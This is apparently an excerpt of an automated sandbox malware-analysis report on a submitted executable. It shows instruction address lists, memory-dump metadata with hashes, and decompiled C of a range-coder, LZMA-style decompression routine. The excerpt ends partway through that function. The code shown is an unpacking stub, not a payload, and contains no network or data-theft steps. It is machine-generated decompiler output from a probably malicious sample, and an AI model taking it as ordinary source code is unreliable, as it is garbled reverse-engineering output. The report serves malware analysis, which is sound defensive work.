                      0x00406ede
                      0x00406ee1
                      0x00406ee4
                      0x00406ee7
                      0x00406eea
                      0x00406eed
                      0x00406ef0
                      0x00406ef3
                      0x00406ef6
                      0x00406ef9
                      0x00406efc
                      0x00406f14
                      0x00406f17
                      0x00406f1a
                      0x00406f1d
                      0x00406f1d
                      0x00406f20
                      0x00406f24
                      0x00406f26
                      0x00406efe
                      0x00406efe
                      0x00406f06
                      0x00406f0b
                      0x00406f0d
                      0x00406f0f
                      0x00406f0f
                      0x00406f29
                      0x00406f30
                      0x00406f33
                      0x00000000
                      0x00406f35
                      0x00000000
                      0x00406f35
                      0x00406f33
                      0x00406f3a
                      0x00406f3a
                      0x00406f3a
                      0x00406f3a
                      0x00000000
                      0x00000000
                      0x00406f75
                      0x00406f75
                      0x00406f79
                      0x00407581
                      0x00000000
                      0x00407581
                      0x00406f7f
                      0x00406f82
                      0x00406f85
                      0x00406f89
                      0x00406f8c
                      0x00406f92
                      0x00406f94
                      0x00406f94
                      0x00406f94
                      0x00406f97
                      0x00406f9a
                      0x00406f9a
                      0x00406fa0
                      0x00406f3e
                      0x00406f3e
                      0x00406f41
                      0x00000000
                      0x00406f41
                      0x00406fa2
                      0x00406fa2
                      0x00406fa5
                      0x00406fa8
                      0x00406fab
                      0x00406fae
                      0x00406fb1
                      0x00406fb4
                      0x00406fb7
                      0x00406fba
                      0x00406fbd
                      0x00406fc0
                      0x00406fd8
                      0x00406fdb
                      0x00406fde
                      0x00406fe1
                      0x00406fe1
                      0x00406fe4
                      0x00406fe8
                      0x00406fea
                      0x00406fc2
                      0x00406fc2
                      0x00406fca
                      0x00406fcf
                      0x00406fd1
                      0x00406fd3
                      0x00406fd3
                      0x00406fed
                      0x00406ff4
                      0x00406ff7
                      0x00000000
                      0x00406ff9
                      0x00000000
                      0x00406ff9
                      0x00000000
                      0x00407286
                      0x00407286
                      0x0040728a
                      0x004075b1
                      0x00000000
                      0x004075b1
                      0x00407290
                      0x00407293
                      0x00407296
                      0x0040729a
                      0x0040729d
                      0x004072a3
                      0x004072a5
                      0x004072a5
                      0x004072a5
                      0x004072a8
                      0x00000000
                      0x00000000
                      0x00407056
                      0x00407056
                      0x00407059
                      0x004073cb
                      0x004073cb
                      0x004073cb
                      0x00000000
                      0x004073cb
                      0x00000000
                      0x00407395
                      0x00407399
                      0x004073bb
                      0x004073be
                      0x004073c8
                      0x004073cb
                      0x004073cb
                      0x004073cb
                      0x00000000
                      0x004073cb
                      0x004073cb
                      0x0040739b
                      0x0040739e
                      0x004073a2
                      0x004073a5
                      0x004073a5
                      0x004073a8
                      0x00000000
                      0x00000000
                      0x00407452
                      0x00407456
                      0x00407474
                      0x00407474
                      0x00407474
                      0x0040747b
                      0x00407482
                      0x00407489
                      0x00407489
                      0x00000000
                      0x00407489
                      0x00407458
                      0x0040745b
                      0x0040745e
                      0x00407461
                      0x00407468
                      0x004073ac
                      0x004073ac
                      0x004073af
                      0x00000000
                      0x00000000
                      0x00407543
                      0x00407546
                      0x00407447
                      0x00000000
                      0x00000000
                      0x0040717d
                      0x0040717f
                      0x00407186
                      0x00407187
                      0x00407189
                      0x0040718c
                      0x00000000
                      0x00000000
                      0x00407194
                      0x00407197
                      0x0040719a
                      0x0040719c
                      0x0040719e
                      0x0040719e
                      0x0040719f
                      0x004071a2
                      0x004071a9
                      0x004071ac
                      0x004071ba
                      0x00000000
                      0x00000000
                      0x00407490
                      0x00407490
                      0x00407493
                      0x0040749a
                      0x00000000
                      0x00000000
                      0x0040749f
                      0x0040749f
                      0x004074a3
                      0x004075db
                      0x00000000
                      0x004075db
                      0x004074a9
                      0x004074ac
                      0x004074af
                      0x004074b3
                      0x004074b6
                      0x004074bc
                      0x004074be
                      0x004074be
                      0x004074be
                      0x004074c1
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c7
                      0x004074c7
                      0x004074cb
                      0x0040752b
                      0x0040752e
                      0x00407533
                      0x00407534
                      0x00407536
                      0x00407538
                      0x0040753b
                      0x00407447
                      0x00407447
                      0x00000000
                      0x0040744d
                      0x00407447
                      0x004074cd
                      0x004074d3
                      0x004074d6
                      0x004074d9
                      0x004074dc
                      0x004074df
                      0x004074e2
                      0x004074e5
                      0x004074e8
                      0x004074eb
                      0x004074ee
                      0x00407507
                      0x0040750a
                      0x0040750d
                      0x00407510
                      0x00407514
                      0x00407516
                      0x00407516
                      0x00407517
                      0x0040751a
                      0x004074f0
                      0x004074f0
                      0x004074f8
                      0x004074fd
                      0x004074ff
                      0x00407502
                      0x00407502
                      0x0040751d
                      0x00407524
                      0x00000000
                      0x00407526
                      0x00000000
                      0x00407526
                      0x00000000
                      0x004071c2
                      0x004071c5
                      0x004071fb
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732e
                      0x0040732e
                      0x00407331
                      0x00407333
                      0x004075bd
                      0x00000000
                      0x004075bd
                      0x00407339
                      0x0040733c
                      0x00000000
                      0x00000000
                      0x00407342
                      0x00407346
                      0x00407349
                      0x00407349
                      0x00407349
                      0x00000000
                      0x00407349
                      0x004071c7
                      0x004071c9
                      0x004071cb
                      0x004071cd
                      0x004071d0
                      0x004071d1
                      0x004071d3
                      0x004071d5
                      0x004071d8
                      0x004071db
                      0x004071f1
                      0x004071f6
                      0x0040722e
                      0x0040722e
                      0x00407232
                      0x0040725e
                      0x00407260
                      0x00407267
                      0x0040726a
                      0x0040726d
                      0x0040726d
                      0x00407272
                      0x00407272
                      0x00407274
                      0x00407277
                      0x0040727e
                      0x00407281
                      0x004072ae
                      0x004072ae
                      0x004072b1
                      0x004072b4
                      0x00407328
                      0x00407328
                      0x00407328
                      0x00000000
                      0x00407328
                      0x004072b6
                      0x004072bc
                      0x004072bf
                      0x004072c2
                      0x004072c5
                      0x004072c8
                      0x004072cb
                      0x004072ce
                      0x004072d1
                      0x004072d4
                      0x004072d7
                      0x004072f0
                      0x004072f2
                      0x004072f5
                      0x004072f6
                      0x004072f9
                      0x004072fb
                      0x004072fe
                      0x00407300
                      0x00407302
                      0x00407305
                      0x00407307
                      0x0040730a
                      0x0040730e
                      0x00407310
                      0x00407310
                      0x00407311
                      0x00407314
                      0x00407317
                      0x004072d9
                      0x004072d9
                      0x004072e1
                      0x004072e6
                      0x004072e8
                      0x004072eb
                      0x004072eb
                      0x0040731a
                      0x00407321
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x00000000
                      0x00407323
                      0x00000000
                      0x00407323
                      0x00407321
                      0x00407234
                      0x00407237
                      0x00407239
                      0x0040723c
                      0x0040723f
                      0x00407242
                      0x00407244
                      0x00407247
                      0x0040724a
                      0x0040724a
                      0x0040724d
                      0x0040724d
                      0x00407250
                      0x00407257
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x00000000
                      0x00407259
                      0x00000000
                      0x00407259
                      0x00407257
                      0x004071dd
                      0x004071e0
                      0x004071e2
                      0x004071e5
                      0x00000000
                      0x00000000
                      0x00406f44
                      0x00406f44
                      0x00406f48
                      0x0040758d
                      0x00000000
                      0x0040758d
                      0x00406f4e
                      0x00406f51
                      0x00406f54
                      0x00406f57
                      0x00406f5a
                      0x00406f5d
                      0x00406f60
                      0x00406f62
                      0x00406f65
                      0x00406f68
                      0x00406f6b
                      0x00406f6d
                      0x00406f6d
                      0x00406f6d
                      0x00000000
                      0x00000000
                      0x004070cf
                      0x004070cf
                      0x004070d3
                      0x00407599
                      0x00000000
                      0x00407599
                      0x004070d9
                      0x004070dc
                      0x004070df
                      0x004070e2
                      0x004070e4
                      0x004070e4
                      0x004070e4
                      0x004070e7
                      0x004070ea
                      0x004070ed
                      0x004070f0
                      0x004070f3
                      0x004070f6
                      0x004070f7
                      0x004070f9
                      0x004070f9
                      0x004070f9
                      0x004070fc
                      0x004070ff
                      0x00407102
                      0x00407105
                      0x00407105
                      0x00407105
                      0x00407108
                      0x0040710a
                      0x0040710a
                      0x00000000
                      0x00000000
                      0x0040734c
                      0x0040734c
                      0x0040734c
                      0x00407350
                      0x00000000
                      0x00000000
                      0x00407356
                      0x00407359
                      0x0040735c
                      0x0040735f
                      0x00407361
                      0x00407361
                      0x00407361
                      0x00407364
                      0x00407367
                      0x0040736a
                      0x0040736d
                      0x00407370
                      0x00407373
                      0x00407374
                      0x00407376
                      0x00407376
                      0x00407376
                      0x00407379
                      0x0040737c
                      0x0040737f
                      0x00407382
                      0x00407385
                      0x00407389
                      0x0040738b
                      0x0040738e
                      0x00000000
                      0x00407390
                      0x0040710d
                      0x0040710d
                      0x00000000
                      0x0040710d
                      0x0040738e
                      0x004075c3
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x004075fa
                      0x004075fa
                      0x00000000
                      0x004075fa
                      0x00407447
                      0x004073ce
                      0x004073cb
                      0x00000000
                      0x00407002

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                      • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                      • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                      • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E0040711C() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						 *(_t613 - 0x84) = 0xb;
                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                      						goto L132;
                      					} else {
                      						__eax =  *(__ebp - 0x28);
                      						L88:
                      						 *(__ebp - 0x2c) = __eax;
                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      						L89:
                      						__eax =  *(__ebp - 4);
                      						 *(__ebp - 0x80) = 0x15;
                      						__eax =  *(__ebp - 4) + 0xa68;
                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      						L69:
                      						 *(__ebp - 0x84) = 0x12;
                      						while(1) {
                      							L132:
                      							 *(_t613 - 0x54) = _t606;
                      							while(1) {
                      								L133:
                      								_t531 =  *_t606;
                      								_t589 = _t531 & 0x0000ffff;
                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      								if( *(_t613 - 0xc) >= _t565) {
                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      									 *(_t613 - 0x40) = 1;
                      									_t532 = _t531 - (_t531 >> 5);
                      									 *_t606 = _t532;
                      								} else {
                      									 *(_t613 - 0x10) = _t565;
                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      								}
                      								if( *(_t613 - 0x10) >= 0x1000000) {
                      									goto L139;
                      								}
                      								L137:
                      								if( *(_t613 - 0x6c) == 0) {
                      									 *(_t613 - 0x88) = 5;
                      									L170:
                      									_t568 = 0x22;
                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      									_t535 = 0;
                      									L172:
                      									return _t535;
                      								}
                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      								L139:
                      								_t533 =  *(_t613 - 0x84);
                      								while(1) {
                      									 *(_t613 - 0x88) = _t533;
                      									while(1) {
                      										L1:
                      										_t534 =  *(_t613 - 0x88);
                      										if(_t534 > 0x1c) {
                      											break;
                      										}
                      										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                      											case 0:
                      												if( *(_t613 - 0x6c) == 0) {
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      												_t534 =  *( *(_t613 - 0x70));
                      												if(_t534 > 0xe1) {
                      													goto L171;
                      												}
                      												_t538 = _t534 & 0x000000ff;
                      												_push(0x2d);
                      												asm("cdq");
                      												_pop(_t570);
                      												_push(9);
                      												_pop(_t571);
                      												_t609 = _t538 / _t570;
                      												_t540 = _t538 % _t570 & 0x000000ff;
                      												asm("cdq");
                      												_t604 = _t540 % _t571 & 0x000000ff;
                      												 *(_t613 - 0x3c) = _t604;
                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      													L10:
                      													if(_t612 == 0) {
                      														L12:
                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      														goto L15;
                      													} else {
                      														goto L11;
                      													}
                      													do {
                      														L11:
                      														_t612 = _t612 - 1;
                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      													} while (_t612 != 0);
                      													goto L12;
                      												}
                      												if( *(_t613 - 4) != 0) {
                      													GlobalFree( *(_t613 - 4));
                      												}
                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                      												 *(_t613 - 4) = _t534;
                      												if(_t534 == 0) {
                      													goto L171;
                      												} else {
                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      													goto L10;
                      												}
                      											case 1:
                      												L13:
                      												__eflags =  *(_t613 - 0x6c);
                      												if( *(_t613 - 0x6c) == 0) {
                      													 *(_t613 - 0x88) = 1;
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      												_t45 = _t613 - 0x48;
                      												 *_t45 =  *(_t613 - 0x48) + 1;
                      												__eflags =  *_t45;
                      												L15:
                      												if( *(_t613 - 0x48) < 4) {
                      													goto L13;
                      												}
                      												_t546 =  *(_t613 - 0x40);
                      												if(_t546 ==  *(_t613 - 0x74)) {
                      													L20:
                      													 *(_t613 - 0x48) = 5;
                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      													goto L23;
                      												}
                      												 *(_t613 - 0x74) = _t546;
                      												if( *(_t613 - 8) != 0) {
                      													GlobalFree( *(_t613 - 8));
                      												}
                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      												 *(_t613 - 8) = _t534;
                      												if(_t534 == 0) {
                      													goto L171;
                      												} else {
                      													goto L20;
                      												}
                      											case 2:
                      												L24:
                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      												 *(_t613 - 0x84) = 6;
                      												 *(_t613 - 0x4c) = _t553;
                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                      												L132:
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											case 3:
                      												L21:
                      												__eflags =  *(_t613 - 0x6c);
                      												if( *(_t613 - 0x6c) == 0) {
                      													 *(_t613 - 0x88) = 3;
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												_t67 = _t613 - 0x70;
                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      												__eflags =  *_t67;
                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      												L23:
                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      												if( *(_t613 - 0x48) != 0) {
                      													goto L21;
                      												}
                      												goto L24;
                      											case 4:
                      												L133:
                      												_t531 =  *_t606;
                      												_t589 = _t531 & 0x0000ffff;
                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      												if( *(_t613 - 0xc) >= _t565) {
                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      													 *(_t613 - 0x40) = 1;
                      													_t532 = _t531 - (_t531 >> 5);
                      													 *_t606 = _t532;
                      												} else {
                      													 *(_t613 - 0x10) = _t565;
                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      												}
                      												if( *(_t613 - 0x10) >= 0x1000000) {
                      													goto L139;
                      												}
                      											case 5:
                      												goto L137;
                      											case 6:
                      												__edx = 0;
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x34) = 1;
                      													 *(__ebp - 0x84) = 7;
                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      													while(1) {
                      														L132:
                      														 *(_t613 - 0x54) = _t606;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      												__esi =  *(__ebp - 0x60);
                      												__cl = 8;
                      												__cl = 8 -  *(__ebp - 0x3c);
                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      												__ecx =  *(__ebp - 0x3c);
                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      												__ecx =  *(__ebp - 4);
                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      												__eflags =  *(__ebp - 0x38) - 4;
                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												if( *(__ebp - 0x38) >= 4) {
                      													__eflags =  *(__ebp - 0x38) - 0xa;
                      													if( *(__ebp - 0x38) >= 0xa) {
                      														_t98 = __ebp - 0x38;
                      														 *_t98 =  *(__ebp - 0x38) - 6;
                      														__eflags =  *_t98;
                      													} else {
                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      													}
                      												} else {
                      													 *(__ebp - 0x38) = 0;
                      												}
                      												__eflags =  *(__ebp - 0x34) - __edx;
                      												if( *(__ebp - 0x34) == __edx) {
                      													__ebx = 0;
                      													__ebx = 1;
                      													goto L61;
                      												} else {
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__ecx =  *(__ebp - 8);
                      													__ebx = 0;
                      													__ebx = 1;
                      													__al =  *((intOrPtr*)(__eax + __ecx));
                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      													goto L41;
                      												}
                      											case 7:
                      												__eflags =  *(__ebp - 0x40) - 1;
                      												if( *(__ebp - 0x40) != 1) {
                      													__eax =  *(__ebp - 0x24);
                      													 *(__ebp - 0x80) = 0x16;
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x28);
                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      													__eax =  *(__ebp - 0x2c);
                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      													__eax = 0;
                      													__eflags =  *(__ebp - 0x38) - 7;
                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      													__al = __al & 0x000000fd;
                      													__eax = (__eflags >= 0) - 1 + 0xa;
                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x664;
                      													__eflags = __eax;
                      													 *(__ebp - 0x58) = __eax;
                      													goto L69;
                      												}
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 8;
                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													L132:
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											case 8:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xa;
                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      												} else {
                      													__eax =  *(__ebp - 0x38);
                      													__ecx =  *(__ebp - 4);
                      													__eax =  *(__ebp - 0x38) + 0xf;
                      													 *(__ebp - 0x84) = 9;
                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      												}
                      												while(1) {
                      													L132:
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											case 9:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													goto L89;
                      												}
                      												__eflags =  *(__ebp - 0x60);
                      												if( *(__ebp - 0x60) == 0) {
                      													goto L171;
                      												}
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      												__eflags = _t259;
                      												0 | _t259 = _t259 + _t259 + 9;
                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      												goto L76;
                      											case 0xa:
                      												goto L0;
                      											case 0xb:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__ecx =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x20);
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												} else {
                      													__eax =  *(__ebp - 0x24);
                      												}
                      												__ecx =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												goto L88;
                      											case 0xc:
                      												L99:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xc;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t334 = __ebp - 0x70;
                      												 *_t334 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t334;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												__eax =  *(__ebp - 0x2c);
                      												goto L101;
                      											case 0xd:
                      												L37:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xd;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t122 = __ebp - 0x70;
                      												 *_t122 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t122;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L39:
                      												__eax =  *(__ebp - 0x40);
                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      													goto L48;
                      												}
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													goto L54;
                      												}
                      												L41:
                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      												 *(__ebp - 0x48) = __eax;
                      												__eax = __eax + 1;
                      												__eax = __eax << 8;
                      												__eax = __eax + __ebx;
                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edx = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													 *(__ebp - 0x40) = 1;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													__ebx = __ebx + __ebx + 1;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edx;
                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L39;
                      												} else {
                      													goto L37;
                      												}
                      											case 0xe:
                      												L46:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xe;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t156 = __ebp - 0x70;
                      												 *_t156 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t156;
